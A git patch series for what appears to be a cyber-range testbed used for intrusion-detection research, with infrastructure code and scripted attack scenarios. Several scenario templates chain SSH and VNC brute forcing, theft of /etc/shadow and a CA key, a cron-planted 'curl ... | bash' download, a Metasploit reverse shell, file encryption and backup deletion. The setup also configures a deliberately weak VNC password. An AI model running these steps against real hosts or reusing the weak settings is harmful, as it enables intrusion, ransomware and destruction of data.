From 8047d2b1761a15f5a0fd4442444813c6194177ce Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Fri, 27 Sep 2024 10:27:39 +0200 Subject: [PATCH 01/12] use network uuids --- terragrunt/bootstrap/module/main.tf | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 985a7ab..30d0a86 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.inet_cidr,514) } @@ -166,17 +166,17 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.inet_cidr,254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.lan_cidr,254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.dmz_cidr,254) } @@ -228,17 +228,17 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_internet_ip } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_lan_ip } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_dmz_ip } From a2f765c57214eddd7887bad13a64b5c9e4a8fe9f Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Mon, 30 Sep 2024 12:24:25 +0200 Subject: [PATCH 02/12] use network uuids in videoserver module --- terragrunt/videoserver/module/adminpc.tf | 13 +++++++++++-- .../videoserver/module/adminpc_variables.tf | 2 +- terragrunt/videoserver/module/dnsserver.tf | 11 ++++++++++- .../videoserver/module/dnsserver_variables.tf | 2 +- .../videoserver/module/fetch_network_uuid.sh | 18 ++++++++++++++++++ terragrunt/videoserver/module/videoserver.tf | 11 ++++++++++- .../module/videoserver_variables.tf | 2 +- terragrunt/videoserver/module/webcam.tf | 3 ++- .../videoserver/module/webcam_variables.tf | 2 +- 9 files changed, 55 insertions(+), 9 deletions(-) create mode 100644 terragrunt/videoserver/module/fetch_network_uuid.sh diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index a879f2f..36d1bb6 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -4,8 +4,17 @@ locals { #################################################################### # -# CREATE INSTANCE for "VIDEOSERVER" +# CREATE INSTANCE for "ADMIN" # + +data "external" "lan_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "lan" + } +} + data "template_file" "userdata_adminpc" { template = "${file("${local.ext_adminpc_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "lan" + uuid ="${data.external.lan_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.lan_cidr,222) } diff --git a/terragrunt/videoserver/module/adminpc_variables.tf b/terragrunt/videoserver/module/adminpc_variables.tf index f0c926c..7f38d91 100644 --- a/terragrunt/videoserver/module/adminpc_variables.tf +++ b/terragrunt/videoserver/module/adminpc_variables.tf @@ -6,7 +6,7 @@ variable "adminpc_image" { variable "adminpc_flavor" { type = string description = "flavor of the adminpc host" - default = "m1.small" + default = "d2-2" } variable "adminpc_userdata" { diff --git a/terragrunt/videoserver/module/dnsserver.tf b/terragrunt/videoserver/module/dnsserver.tf index 5a184a1..a169967 100644 --- a/terragrunt/videoserver/module/dnsserver.tf +++ b/terragrunt/videoserver/module/dnsserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "DNS-Server" # + +data "external" "internet_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "internet" + } +} + data "template_file" "userdata_dnsserver" { template = "${file("${local.ext_dnsserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "dnsserver" { user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered network { - name = "internet" + uuid = "${data.external.internet_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.inet_cidr,233) } diff --git a/terragrunt/videoserver/module/dnsserver_variables.tf b/terragrunt/videoserver/module/dnsserver_variables.tf index 629299a..39d727f 100644 --- a/terragrunt/videoserver/module/dnsserver_variables.tf +++ b/terragrunt/videoserver/module/dnsserver_variables.tf @@ -6,7 +6,7 @@ variable "dnsserver_image" { variable "dnsserver_flavor" { type = string description = "flavor of the dnsserver host" - default = "m1.small" + default = "d2-2" } variable "dnsserver_userdata" { diff --git a/terragrunt/videoserver/module/fetch_network_uuid.sh b/terragrunt/videoserver/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/videoserver/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/videoserver.tf b/terragrunt/videoserver/module/videoserver.tf index 15c1321..734513a 100644 --- a/terragrunt/videoserver/module/videoserver.tf +++ b/terragrunt/videoserver/module/videoserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "VIDEOSERVER" # + +data "external" "dmz_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "dmz" + } +} + data "template_file" "userdata_videoserver" { template = "${file("${local.ext_videoserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "videoserver" { user_data = local.ext_videoserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitvideoserver[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,121) } diff --git a/terragrunt/videoserver/module/videoserver_variables.tf b/terragrunt/videoserver/module/videoserver_variables.tf index 4b4f250..61ee45a 100644 --- a/terragrunt/videoserver/module/videoserver_variables.tf +++ b/terragrunt/videoserver/module/videoserver_variables.tf @@ -6,7 +6,7 @@ variable "videoserver_image" { variable "videoserver_flavor" { type = string description = "flavor of the videoserver host" - default = "m1.small" + default = "d2-2" } variable "videoserver_userdata" { diff --git a/terragrunt/videoserver/module/webcam.tf b/terragrunt/videoserver/module/webcam.tf index 426857c..50a0b85 100644 --- a/terragrunt/videoserver/module/webcam.tf +++ b/terragrunt/videoserver/module/webcam.tf @@ -6,6 +6,7 @@ locals { # # CREATE INSTANCE for "Webcam-Server" # + data "template_file" "userdata_webcam" { template = "${file("${local.ext_webcam_userdata_file}")}" } @@ -35,7 +36,7 @@ resource "openstack_compute_instance_v2" "webcam" { user_data = local.ext_webcam_userdata_file == null ? null : data.template_cloudinit_config.cloudinitwebcam[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,80) } diff --git a/terragrunt/videoserver/module/webcam_variables.tf b/terragrunt/videoserver/module/webcam_variables.tf index b2b8d83..5536b81 100644 --- a/terragrunt/videoserver/module/webcam_variables.tf +++ b/terragrunt/videoserver/module/webcam_variables.tf @@ -6,7 +6,7 @@ variable "webcam_image" { variable "webcam_flavor" { type = string description = "flavor of the webcam host" - default = "m1.small" + default = "d2-2" } variable "webcam_userdata" { From c004e3a1782c919c8aad2ac18c37a28a290c891d Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Mon, 4 Nov 2024 12:41:37 +0100 Subject: [PATCH 03/12] scenario numbering --- ansible/run/scenario3/templates/scenario_3_a_a.j2 | 2 +- ansible/run/scenario3/templates/scenario_3_b.j2 | 2 +- ansible/run/scenario3/templates/scenario_3_c.j2 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/run/scenario3/templates/scenario_3_a_a.j2 b/ansible/run/scenario3/templates/scenario_3_a_a.j2 index 0740e54..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_a.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_a.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 a a # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_b.j2 b/ansible/run/scenario3/templates/scenario_3_b.j2 index 60e3ce8..2a6fc47 100644 --- a/ansible/run/scenario3/templates/scenario_3_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 b # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_c.j2 b/ansible/run/scenario3/templates/scenario_3_c.j2 index db5751b..7a057c0 100644 --- a/ansible/run/scenario3/templates/scenario_3_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_c.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 c # #################### vars: From d8a4445fca66356b6f72811423f2650c92ffe51a Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:04:53 +0100 Subject: [PATCH 04/12] prep scenario 3 a b --- ansible/run/scenario3/templates/scenario_3_a_b.j2 | 0 packer/firewall/playbook/main.yaml | 1 + packer/repository/playbook/main.yaml | 14 ++++++++++---- packer/repository/playbook/requirements.yml | 4 +++- 4 files changed, 14 insertions(+), 5 deletions(-) create mode 100644 ansible/run/scenario3/templates/scenario_3_a_b.j2 diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 new file mode 100644 index 0000000..e69de29 diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index 1c92bc7..83bef6b 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml @@ -83,6 +83,7 @@ - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER:22", proto: tcp, dest_port: 10022 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 3389 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 4501 } + - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 5901 } - Reposerver to Linux-Share - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 1881 } - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 111,2049 } diff --git a/packer/repository/playbook/main.yaml b/packer/repository/playbook/main.yaml index d51577a..e992f7c 100644 --- a/packer/repository/playbook/main.yaml +++ b/packer/repository/playbook/main.yaml @@ -26,6 +26,11 @@ hostname_fqdn: "puppet.aecid-testbed.local" hostname_ip: "172.17.100.122" - role: aeciduser + - role: weaklinuxuser + vars: + weaklinuxuser_sudo: False + weaklinuxuser_groups: + - sudo vars: # pass: aecid aeciduser_pass: "$6$9AqxTPJqYsFXwgPN$xAC4y1Vndk00EaBCuFcJC37BYDYYVAgt9SHymg15KSdKddZnwG.SsQaJvHarH4DYQj3tuboeLa4G5EfL7itcC0" @@ -35,11 +40,12 @@ - role: manage_unattended_upgrades - role: auditd - role: mate-desktop - - role: weaklinuxuser + - role: tightvnc vars: - weaklinuxuser_sudo: False - weaklinuxuser_groups: - - sudo + vnc_user: "john" + vnc_password: "12345678" + vnc_display: ":1" + vnc_port: 5901 - role: puppetserver - role: disableresolved - role: acct diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 3a3269b..eea2d34 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -44,4 +44,6 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-puppetserver.git version: v1.0.0 name: puppetserver - + - src: https://github.com/ait-testbed/atb-ansible-tightvnc.git + version: v1.0.0 + name: tightvnc From 2d2ef873c15c68238f6df3c09a47ac5021366a82 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:06:23 +0100 Subject: [PATCH 05/12] scenario 3 a b --- .../run/scenario3/templates/scenario_3_a_b.j2 | 175 ++++++++++++++++++ 1 file changed, 175 insertions(+) diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 index e69de29..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 @@ -0,0 +1,175 @@ +#################### +# +# Scenario 3 a a +# +#################### +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + $DNS_SERVER: 192.42.0.233 + +commands: + - type: shell + cmd: hydra -C user_pass_combo.txt -s 10022 $SERVER_ADDRESS ssh + + - type: ssh + creates_session: foothold + username: john + password: rambo + hostname: $SERVER_ADDRESS + port: 10022 + cmd: id + + - type: ssh + session: foothold + cmd: "tcpdump -A port 21\n" + interactive: True + + - type: sleep + seconds: 20 + + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + - type: ssh + session: foothold + cmd: "sudo -i\n" + interactive: True + + - type: ssh + session: foothold + cmd: "rambo\n" + interactive: True + + - type: ssh + session: foothold + cmd: "id\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /etc/shadow\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem\n" + interactive: True + + - type: ssh + session: foothold + cmd: "cat /media/share/healthcheck_cron.sh\n" + interactive: True + + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + - type: ssh + session: foothold + cmd: "vim /media/share/healthcheck_cron.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "G" + interactive: True + + - type: ssh + session: foothold + cmd: "o" + interactive: True + + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash\n" + interactive: True + + - type: ssh + session: foothold + cmd: "1B" + interactive: True + bin: True + + - type: ssh + session: foothold + cmd: ":wq\n" + interactive: True +################### MOVED ############################################ + - type: msf-session + session: movement + cmd: sysinfo + + - type: msf-session + session: movement + cmd: getuid + + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + + - type: msf-session + session: movement + cmd: find /media/data/Images + + - type: msf-session + session: movement + cmd: cat /etc/passwd + + - type: msf-session + session: movement + cmd: userdel -f john + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service From c66c3a9d91e487d4f07e2db2ca0b34c53ade18c8 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 14:38:05 +0100 Subject: [PATCH 06/12] use scenario 3_a_b in attacker main --- ansible/run/scenario3/main.yml | 86 ++++++++++++++++++++-------------- 1 file changed, 50 insertions(+), 36 deletions(-) diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 88e74a6..11c180f 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -37,6 +37,7 @@ mode: '0755' loop: - scenario_3_a_a + - scenario_3_a_b - upgrade - scenario_3_b - scenario_3_c @@ -49,50 +50,63 @@ - install - playbooks - - name: "Run Scenario 3 a a" + # - name: "Run Scenario 3 a a" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_a_a + # - metasploit + # - attackmate + # - exploit + + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_b.yml" chdir: "{{user_home.stdout}}" tags: - - scenario_3_a_a + - scenario_3_a_b - metasploit - attackmate - exploit - - name: "Run Scenario 3 b" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_b - - metasploit - - attackmate - - exploit + # - name: "Run Scenario 3 b" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_b + # - metasploit + # - attackmate + # - exploit - - name: "Run Scenario 3 c" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_c - - metasploit - - attackmate - - exploit + # - name: "Run Scenario 3 c" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_c + # - metasploit + # - attackmate + # - exploit + + # - name: "Run Scenario 3 d" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" + # chdir: "{{user_home.stdout}}" + # tags: + # - scenario_3_d + # - metasploit + # - attackmate + # - exploit - - name: "Run Scenario 3 d" - become: True - become_user: "{{attacker_user}}" - ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" - chdir: "{{user_home.stdout}}" - tags: - - scenario_3_d - - metasploit - - attackmate - - exploit From 78be9a4ccc12fbb169782370bc95f185282c8aaf Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 15:55:37 +0100 Subject: [PATCH 07/12] update state repo --- terragrunt/terragrunt.hcl | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/terragrunt/terragrunt.hcl b/terragrunt/terragrunt.hcl index 0c570c5..7b1351b 100644 --- a/terragrunt/terragrunt.hcl +++ b/terragrunt/terragrunt.hcl @@ -1,9 +1,9 @@ remote_state { backend = "http" config = { - address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" - lock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" - unlock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" + lock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + unlock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" username = "${get_env("GITLAB_USERNAME")}" password = "${get_env("CR_GITLAB_ACCESS_TOKEN")}" lock_method = "POST" From 11a99fc66296b9fa65728ffb2b3d78c2f839757e Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:06:58 +0100 Subject: [PATCH 08/12] update fetched network uuids --- .../attacker/module/fetch_network_uuid.sh | 18 ++++++++++++++ terragrunt/bootstrap/module/main.tf | 24 ++++++++++--------- terragrunt/bootstrap/terragrunt.hcl | 6 ++--- terragrunt/fetch_network_uuid.sh | 18 ++++++++++++++ terragrunt/videoserver/module/adminpc.tf | 2 +- 5 files changed, 53 insertions(+), 15 deletions(-) create mode 100644 terragrunt/attacker/module/fetch_network_uuid.sh create mode 100644 terragrunt/fetch_network_uuid.sh diff --git a/terragrunt/attacker/module/fetch_network_uuid.sh b/terragrunt/attacker/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/attacker/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 259b33f..caf308b 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],514) } @@ -220,27 +220,27 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["lan"],254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["dmz"],254) } network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["admin"],254) } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["user"],254) } @@ -298,30 +298,32 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_ips.internet } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_ips.lan } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_ips.dmz } + network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = local.mgmt_ips.admin } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = local.mgmt_ips.user } + depends_on = [ openstack_networking_network_v2.dmz, openstack_networking_network_v2.internet, diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 3e52381..7af7c4f 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl @@ -11,10 +11,10 @@ inputs = { host_userdata = "firewallinit.yml" ext_router = "taq-router" sshkey = "testbed-key" - inetdns_image = "ubuntu-2204" + inetdns_image = "Ubuntu 22.04" inetfw_image = "atb-fw-inet-lan-dmz-image-2023-08-24T13-50-01Z" - mgmt_image = "ubuntu-2204" - floating_pool = "provider-aecid-208" + mgmt_image = "Ubuntu 22.04" + floating_pool = "AECID-provider-network" } diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index c83872f..6baff51 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -11,7 +11,7 @@ data "external" "lan_uuid" { program = ["bash", "./fetch_network_uuid.sh"] query = { - network_name = "lan" + network_name = "admin" } } From b22a38404f090ea6fed0fd2d63ba4ecfad1161df Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:12:02 +0100 Subject: [PATCH 09/12] add bruteforcing vnc --- .../run/scenario3/templates/scenario_3_a_b.j2 | 138 +++++++++--------- 1 file changed, 68 insertions(+), 70 deletions(-) diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 index 7cb51dd..4bad312 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 @@ -1,68 +1,91 @@ #################### # -# Scenario 3 a a +# Scenario 3 a b # #################### + vars: $SERVER_ADDRESS: 192.42.0.254 $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 - + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + commands: - - type: shell - cmd: hydra -C user_pass_combo.txt -s 10022 $SERVER_ADDRESS ssh - - - type: ssh - creates_session: foothold - username: john - password: rambo - hostname: $SERVER_ADDRESS - port: 10022 - cmd: id - - - type: ssh + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + + - type: vnc session: foothold - cmd: "tcpdump -A port 21\n" - interactive: True - + cmd: click - type: sleep - seconds: 20 + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "03" - interactive: True - bin: True + cmd: type + input: "terminal" - - type: ssh - session: foothold - cmd: "sudo -i\n" - interactive: True + - type: sleep + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "rambo\n" - interactive: True + cmd: key + key: "enter" + + - type: sleep + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "id\n" - interactive: True + cmd: type + input: "sudo -i" - - type: ssh + - type: sleep + seconds: 3 + + - type: vnc session: foothold - cmd: "cat /etc/shadow\n" - interactive: True + cmd: key + key: "enter" + + - type: sleep + seconds: 2 - - type: ssh + - type: vnc session: foothold - cmd: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem\n" - interactive: True + cmd: type + input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh + + - type: sleep + seconds: 2 - - type: ssh + - type: vnc session: foothold - cmd: "cat /media/share/healthcheck_cron.sh\n" - interactive: True + cmd: key + key: "enter" + + - type: sleep + seconds: 1 - type: mktemp cmd: file @@ -91,37 +114,11 @@ commands: background: True kill_on_exit: true - - type: ssh - session: foothold - cmd: "vim /media/share/healthcheck_cron.sh\n" - interactive: True - - - type: ssh - session: foothold - cmd: "G" - interactive: True - - - type: ssh + - type: vnc + cmd: close session: foothold - 